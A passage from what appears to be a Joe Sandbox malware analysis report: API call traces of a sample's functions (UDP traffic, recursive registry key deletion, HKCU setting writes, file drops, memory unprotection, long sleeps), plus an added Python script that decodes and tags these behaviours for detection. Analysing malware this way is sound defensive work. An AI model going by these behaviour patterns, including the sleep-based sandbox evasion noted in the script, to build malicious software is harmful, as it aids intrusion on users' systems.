                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 485722307-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 472cc717a78b56e6839e108968adccc54dfc7cddf7ecbc67f1f06ae15fb25f84
                                                                                                                                                                                                                                                                                            • Instruction ID: 5a5129247391c1ddd97313865dafe6653fa9d5f7b30b36b48c1333c3526d811f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 472cc717a78b56e6839e108968adccc54dfc7cddf7ecbc67f1f06ae15fb25f84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 913108F4904205DBE7249B64EC4979AF774AB9C709F0042AAF305B62E0CBB54985CF25
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 01437203
• sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
• select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
• recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01437374
• closesocket.WS2_32(?), ref: 0143750D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: closesocketrecvfromselectsendtosocket
• String ID: @
• API String ID: 4198204009-2766056989
• Opcode ID: 5924b0decf69c51d315920499ef1b2c4b1992526306c492b3e009b93be33b3c3
• Instruction ID: 1eb7dcaf7e5b8791618904105a6208fb9c7455049f400e745ac9aee125ac386c
• Opcode Fuzzy Hash: 5924b0decf69c51d315920499ef1b2c4b1992526306c492b3e009b93be33b3c3
• Instruction Fuzzy Hash: 019195B0D041A99AEB34CB24DC50BEEBB75AF88311F5441DAE29DA62D0D7B06EC4CF50
APIs
• RegOpenKeyExA.KERNEL32(01439F2F,01432E8C,00000000,000F003F,01439F2F), ref: 01438FA0
• RegEnumValueA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01438FD7
• RegDeleteValueA.KERNEL32(01439F2F,00000000), ref: 01439000
• RegEnumKeyExA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01439038
• wsprintfA.USER32 ref: 0143906B
• RegDeleteKeyA.ADVAPI32(01439F2F,00000000), ref: 01439092
• RegCloseKey.ADVAPI32(01439F2F), ref: 014390AF
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteEnumValue$CloseOpenwsprintf
• String ID:
• API String ID: 2321319729-0
• Opcode ID: dae3b593967fc50b20d80883f560c691baf4737450faabb24caa7e0b83098f3e
• Instruction ID: 6390721c1bb2b9fa5fe7fc0d7cf1b1a3cd1d0f26482122dc8984cc4f7c23432f
• Opcode Fuzzy Hash: dae3b593967fc50b20d80883f560c691baf4737450faabb24caa7e0b83098f3e
• Instruction Fuzzy Hash: 404142F5A00248FBDB24CFA4CC94BDEBBB9AB88704F10C199E305A7294D77497498F94
APIs
• RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03
• RegSetValueExA.KERNELBASE(?,01432488,00000000,00000004,00000002,00000004), ref: 01442F31
• RegCloseKey.KERNEL32(?), ref: 01442F3E
• lstrcpy.KERNEL32(00000000,01432550), ref: 01442F99
• lstrcat.KERNEL32(00000000,01432548), ref: 01442FAC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CloseOpenValuelstrcatlstrcpy
• String ID: >
• API String ID: 1115058322-325317158
• Opcode ID: e30e9e9d6e81c4a734e14d7790dd11107e741bc6a06cdb0d30b6e8132ebbeef0
• Instruction ID: eba98e3e063a73e8e2f1a1ad8189e9352baaaad0210cb50ff06b589158fb3315
• Opcode Fuzzy Hash: e30e9e9d6e81c4a734e14d7790dd11107e741bc6a06cdb0d30b6e8132ebbeef0
• Instruction Fuzzy Hash: FA313EB5A002149BE724CF64DC54FEAB779EB69700F0086CAF74967254DAF45AC4CF90
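The function listings above (the thread that sleeps and exits, the UDP socket/sendto/recvfrom exchange, the RegEnumValue/RegDeleteValue/RegEnumKeyEx/RegDeleteKey loop, the HKCU RegSetValueExA write) and the GetTickCount/wsprintfA/CreateFileA function that follows only become readable once the raw hexadecimal arguments are matched against the Win32 prototypes: 80000001 is HKEY_CURRENT_USER, 000F003F is KEY_ALL_ACCESS, the type 00000004 in RegSetValueExA is REG_DWORD, socket(2,2,11) is AF_INET/SOCK_DGRAM/IPPROTO_UDP, CreateFileA's 40000000 and disposition 00000002 are GENERIC_WRITE and CREATE_ALWAYS, and Sleep(00249F00) is 2,400,000 ms, forty minutes. The Python that follows is an added example, not code from Joe Sandbox or from the analysed sample: it parses bullets in the report's APIs format, decodes the constants the prototypes fix, and tags each function with the behaviour its call sequence evidences. The tag names and the ten-minute threshold for a long sleep are this example's own conventions; the sample blocks are copied verbatim from the listings on this page.

```python
# Added example (not Joe Sandbox or sample code): decode 'APIs' bullets from the
# report and tag the behaviour each function's call sequence evidences.
import re
from typing import Dict, List, Optional

# One bullet, e.g. "RegOpenKeyExA.KERNEL32(80000001,...,000F003F,?,?), ref: 01442F03"
# or, when arguments were not captured, "GetTickCount.KERNEL32 ref: 01440BCE".
API_LINE = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# Documented Win32 constants; applied only at argument positions the prototypes fix.
HKEY_ROOTS = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
REG_TYPES = {1: "REG_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
SOCK_TYPES, IPPROTOS = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}, {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
KEY_ALL_ACCESS, GENERIC_READ, GENERIC_WRITE = 0xF003F, 0x80000000, 0x40000000
LONG_SLEEP_MS = 600_000  # example's own threshold: >= 10 min outlasts most sandbox runs

def _h(v: Optional[int]) -> str:
    return "?" if v is None else f"0x{v:X}"

def parse_api_line(line: str) -> Optional[Dict]:
    """Return {'api','mod','args','ref'} for one bullet, None for other lines.
    Arguments become ints; '?' (not captured by the sandbox) becomes None."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = (m.group("args") or "").strip()
    args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "mod": m.group("mod"), "args": args, "ref": int(m.group("ref"), 16)}

def decode(call: Dict) -> str:
    """Render the security-relevant arguments of a call with their symbolic names."""
    api, a = call["api"], call["args"]
    if api.startswith("RegOpenKeyEx") and len(a) >= 4:
        root = HKEY_ROOTS.get(a[0], "hKey=" + _h(a[0]))
        sam = "KEY_ALL_ACCESS" if a[3] == KEY_ALL_ACCESS else "samDesired=" + _h(a[3])
        return f"{api}({root}, ..., {sam})"
    if api.startswith("RegSetValueEx") and len(a) >= 6:
        return f"{api}(type={REG_TYPES.get(a[3], _h(a[3]))}, cbData={a[5]})"
    if api == "socket" and len(a) == 3:
        fam = "AF_INET" if a[0] == 2 else _h(a[0])
        return f"socket({fam}, {SOCK_TYPES.get(a[1], _h(a[1]))}, {IPPROTOS.get(a[2], _h(a[2]))})"
    if api.startswith("CreateFile") and len(a) >= 7:
        acc = a[1] or 0
        names = [n for bit, n in ((GENERIC_READ, "GENERIC_READ"), (GENERIC_WRITE, "GENERIC_WRITE")) if acc & bit]
        return f"{api}(access={'|'.join(names) or _h(a[1])}, disposition={DISPOSITIONS.get(a[4], _h(a[4]))})"
    if api == "Sleep" and len(a) == 1 and a[0] is not None:
        return f"Sleep({a[0]} ms = {a[0] / 60000:.1f} min)"
    return api

def flag_behaviours(block: List[str]) -> List[str]:
    """Tag one function's listing; every call that characterises a behaviour must be
    present in the same function, so a lone RegDeleteValue does not fire."""
    calls = [c for c in map(parse_api_line, block) if c]
    # Fold RegXxxA/RegXxxW onto one name; leave non-registry names (sendto, ...) alone.
    base = {c["api"].rstrip("AW") if c["api"].startswith("Reg") else c["api"] for c in calls}
    tags = []
    if {"socket", "sendto", "recvfrom"} <= base and any(
            c["api"] == "socket" and len(c["args"]) == 3 and c["args"][1] == 2 for c in calls):
        tags.append("udp_request_response")         # datagram out, then wait for a reply
    if {"RegEnumValue", "RegDeleteValue", "RegEnumKeyEx", "RegDeleteKey"} <= base:
        tags.append("recursive_registry_key_wipe")  # enumerate-and-delete loop over a key tree
    if any(c["api"].startswith("RegOpenKeyEx") and c["args"] and c["args"][0] == 0x80000001 for c in calls) \
            and any(c["api"].startswith("RegSetValueEx") and len(c["args"]) >= 4 and c["args"][3] == 4 for c in calls):
        tags.append("hkcu_dword_policy_write")      # per-user DWORD setting change
    if {"GetTickCount", "wsprintfA"} <= base and any(c["api"].startswith("CreateFile") and len(c["args"]) >= 5
                                                     and (c["args"][1] or 0) & GENERIC_WRITE for c in calls):
        tags.append("tickcount_named_file_drop")    # name from uptime, opened for writing
    if any(c["api"] == "Sleep" and c["args"] and (c["args"][0] or 0) >= LONG_SLEEP_MS for c in calls):
        tags.append("long_sleep")
    return tags

# Sample input: lines copied verbatim from the function listings in this report.
UDP_BLOCK = [
    "• socket.WS2_32(00000002,00000002,00000011), ref: 01437203",
    "• sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D",
    "• recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01437374",
    "• closesocket.WS2_32(?), ref: 0143750D",
]
REG_WIPE_BLOCK = [
    "• RegEnumValueA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01438FD7",
    "• RegDeleteValueA.KERNEL32(01439F2F,00000000), ref: 01439000",
    "• RegEnumKeyExA.KERNEL32(01439F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01439038",
    "• RegDeleteKeyA.ADVAPI32(01439F2F,00000000), ref: 01439092",
]
HKCU_BLOCK = [
    "• RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03",
    "• RegSetValueExA.KERNELBASE(?,01432488,00000000,00000004,00000002,00000004), ref: 01442F31",
]
DROP_BLOCK = [
    "• GetTickCount.KERNEL32 ref: 01440BCE",
    "• wsprintfA.USER32 ref: 01440BEF",
    "• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440C0E",
]

if __name__ == "__main__":
    for name, block in (("udp", UDP_BLOCK), ("regwipe", REG_WIPE_BLOCK), ("hkcu", HKCU_BLOCK), ("drop", DROP_BLOCK)):
        print(name, flag_behaviours(block), [decode(parse_api_line(l)) for l in block])
```

Two caveats a reader of these listings should keep in mind. The decoder names only arguments whose position the prototype fixes; RegSetValueExA's fifth argument is a pointer (lpData), so the 00000002 the sandbox shows there is reported as type REG_DWORD with cbData 4, not as the value written, because the report alone does not prove what the pointer held. Tags are also deliberately conjunctive: the registry wipe fires only when enumerate and delete calls for both values and subkeys sit in one function, which is the shape of a recursive key removal rather than a single value cleanup.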
APIs
• lstrcpy.KERNEL32(?,?), ref: 01440BC8
• GetTickCount.KERNEL32 ref: 01440BCE
• lstrlen.KERNEL32(?,01433D08,00000000), ref: 01440BE1
• wsprintfA.USER32 ref: 01440BEF
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440C0E
• CloseHandle.KERNEL32(?), ref: 01440C2A
• DeleteFileA.KERNEL32(?), ref: 01440C37
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
• String ID:
• API String ID: 3232967151-0
APIs
• RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 01442E52
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01442E6E
• RegCloseKey.ADVAPI32(?), ref: 01442E78
• RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 01442E8C
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01442EA8
• RegCloseKey.ADVAPI32(?), ref: 01442EB2
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CloseValue$CreateOpen
• String ID:
• API String ID: 2738932338-0
APIs
• wsprintfA.USER32 ref: 01434C2F
• lstrcpy.KERNEL32(?,00000000), ref: 01434CDD
• lstrcpy.KERNEL32(?,00000000), ref: 01434D04
• RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 01434D2E
• lstrlen.KERNEL32(?), ref: 01434D3D
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 01434D5D
• RegCloseKey.KERNEL32(?), ref: 01434D6F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Valuelstrcpy$Closelstrlenwsprintf
• String ID: userC:\Windows\
• API String ID: 3050549977-3509716881
APIs
• LoadLibraryA.KERNEL32(?), ref: 014C7C02
• GetProcAddress.KERNEL32(?,014C4FF9), ref: 014C7C20
• ExitProcess.KERNEL32(?,014C4FF9), ref: 014C7C31
• VirtualProtect.KERNEL32(01410000,00001000,00000004,?,00000000), ref: 014C7C7F
• VirtualProtect.KERNEL32(01410000,00001000), ref: 014C7C94
Memory Dump Source
• Source File: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
• String ID:
• API String ID: 1996367037-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dec35c9dfddcf13b3deb57a3b9f576614784eba057bfd1bfffde8799e2a5e16b
                                                                                                                                                                                                                                                                                            • Instruction ID: c5c2bd0037f7633631c2ef260f4b667040c690bdd0289c4a4339009413f502df
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dec35c9dfddcf13b3deb57a3b9f576614784eba057bfd1bfffde8799e2a5e16b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D5116796542124BD7615ABCCCC02B1BBA4EB41A2A718073EC7E6C73E6F7B458068B60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(014494C8), ref: 01438500
                                                                                                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 01438559
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: socket.WS2_32(00000002,00000002,00000011), ref: 01437203
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 014385C1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01437374
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143719B: closesocket.WS2_32(?), ref: 0143750D
                                                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(014494C8), ref: 014386EA
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014386F2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1469894868-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a4445615f9498fe3a16407cd3f82d629cd1884d8926f9864adf5b1b5c651cb9
                                                                                                                                                                                                                                                                                            • Instruction ID: cea0592b1a880267c3df9bd56005c43c469d08e4385d934af6b786a22527a017
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a4445615f9498fe3a16407cd3f82d629cd1884d8926f9864adf5b1b5c651cb9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F15188B4900259CFDB24DF24C890BEAB374BF98304F4086DAE18DA7259D7B19AC4CF51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01441DD7
                                                                                                                                                                                                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01441E14
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 01441E3D
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000100), ref: 01441E73
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01441E90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesCloseEnumFileOpenSleepValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 684116133-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1af97d46e255d67b8fdd55a2d4dec375eecd3bd0cf5754b1511ea3826803ed28
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d80bdeec1e41d104db47ce27f2ea15959cffeea992f3f4536879ea44934dda9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1af97d46e255d67b8fdd55a2d4dec375eecd3bd0cf5754b1511ea3826803ed28
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012174B5E00218EBEB31CB64CC45BEAB778AB58B10F1045D9E349A6191D7F06BC4CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00014000), ref: 01442801
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143C89A: MapViewOfFile.KERNEL32(000001D8,00000006,00000000,00000000,00015400), ref: 0143C8D1
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143C89A: UnmapViewOfFile.KERNEL32(00000000), ref: 0143C900
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 01442849
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002800), ref: 01442924
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01442947
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2983513495-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e26df5e5ebfa0212d8d572bb24ada710902774d919fb1a6d4e2960e9648f8c08
                                                                                                                                                                                                                                                                                            • Instruction ID: 69a58e789c6a059fd8a41c7c805d06c299cad286c68c6733c37ede18f7989eda
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e26df5e5ebfa0212d8d572bb24ada710902774d919fb1a6d4e2960e9648f8c08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF31A2B4E00204ABE710DBA5ED45FDEB7B4AB68B60F14422AF511673A4E7F659008B62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 01441EA3
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01441EEA
                                                                                                                                                                                                                                                                                              • Part of subcall function 01441D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01441DD7
  • Part of subcall function 01441D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01441E14
  • Part of subcall function 01441D8F: RegCloseKey.ADVAPI32(?), ref: 01441E90
• Sleep.KERNEL32(00004E20), ref: 01441EC6
  • Part of subcall function 01441D8F: GetFileAttributesA.KERNEL32(00000000), ref: 01441E3D
  • Part of subcall function 01441D8F: Sleep.KERNEL32(00000100), ref: 01441E73
• Sleep.KERNEL32(00057E40), ref: 01441EE0
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
• String ID:
• API String ID: 3734488975-0
• Opcode ID: 819e8b5a65f77ab65b4110d1802958d5bc83e8488021e9fafedbd04c30eb492e
• Instruction ID: b2e0cc51f4639c48f1e13dbb3c7c3796dbcf91b0f33fb6e4afc49aceb4f9847d
